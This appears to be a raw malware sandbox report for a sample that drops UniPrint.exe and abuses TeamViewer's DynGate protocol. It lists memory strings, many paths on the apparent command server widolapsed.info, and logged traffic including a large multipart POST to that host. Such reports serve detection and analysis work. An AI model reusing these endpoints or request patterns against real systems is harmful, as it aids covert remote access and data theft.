Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316700720.000001BF60664000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316800598.000001BF60645000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316785328.000001BF60640000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.460571183.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/-resource://Microsoft.Microsoft3DViewer4
Source: UniPrint.exe, 00000004.00000003.412925406.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/0p
Source: UniPrint.exe, 00000004.00000003.478775345.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/0pp
Source: UniPrint.exe, 00000004.00000003.325324514.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/1
Source: UniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/2i
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/3DViewer_2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/64__8wekyb3d8bbwe?ms-resource://Microso
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/.Microsoft3DViewer4
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/9
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/al_cw5n1h2txyewy?m0
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/e
Source: UniPrint.exe, 00000004.00000002.545681944.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/esources/StoreAppN
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/ources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/resource://Microso
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/9
Source: UniPrint.exe, 00000004.00000003.489357888.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/=
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.441746843.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.438725277.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/
Source: UniPrint.exe, 00000004.00000003.489357888.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/.Microsoft3DViewer4
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.308537365.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/8
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/9
Source: UniPrint.exe, 00000004.00000003.418618637.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/B
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/E
Source: UniPrint.exe, 00000004.00000003.471440438.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/L
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/R
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/ackageDisplayName
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/al_cw5n1h2txyewy?m0
Source: UniPrint.exe, 00000004.00000003.379200176.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/d.info/B8C631A8/
Source: UniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/e
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/esources/StoreAppN
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/leUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/lopmentPropertiesh
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/lopmentPropertiesl
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/ources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/pName
Source: UniPrint.exe, 00000004.00000003.332650410.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/resource://Microso
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/soft.Microsoft3DVi
Source: UniPrint.exe, 00000004.00000003.348911861.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/t
Source: UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/wer_2.1803.8022.0_l
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/Q
Source: UniPrint.exe, 00000004.00000003.441746843.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/Wp
Source: UniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/a
Source: UniPrint.exe, 00000004.00000003.415242974.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/ameCallableUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.466393951.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/
Source: UniPrint.exe, 00000004.00000003.446837962.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/3DViewer_2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/8C631A8/
Source: UniPrint.exe, 00000004.00000003.489357888.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/8C631A8/9
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/8C631A8/resource://Microso
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.424436468.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/9
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/leUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/lopmentPropertiesh
Source: UniPrint.exe, 00000004.00000003.415242974.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/ources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/soft.Microsoft3DVi
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/ameCallableUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/ervice
Source: UniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/s/StoreAppName
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/tral_neutral_cw5n1h2txyewy?
Source: UniPrint.exe, 00000004.00000003.323291752.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/vider/Resources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/ervice
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/ft.Microsoft3DViewer_2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/i
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/iew.UWP/Resources/StoreAppN
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/s/StoreAppName
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/tral_neutral_cw5n1h2txyewy?
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/vider/Resources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/xIdentityProvider/Resources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/~
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmpString found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: unknownHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76431Content-Type: multipart/form-data; boundary=--------3259937207User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985DF0 InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,WriteFile,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
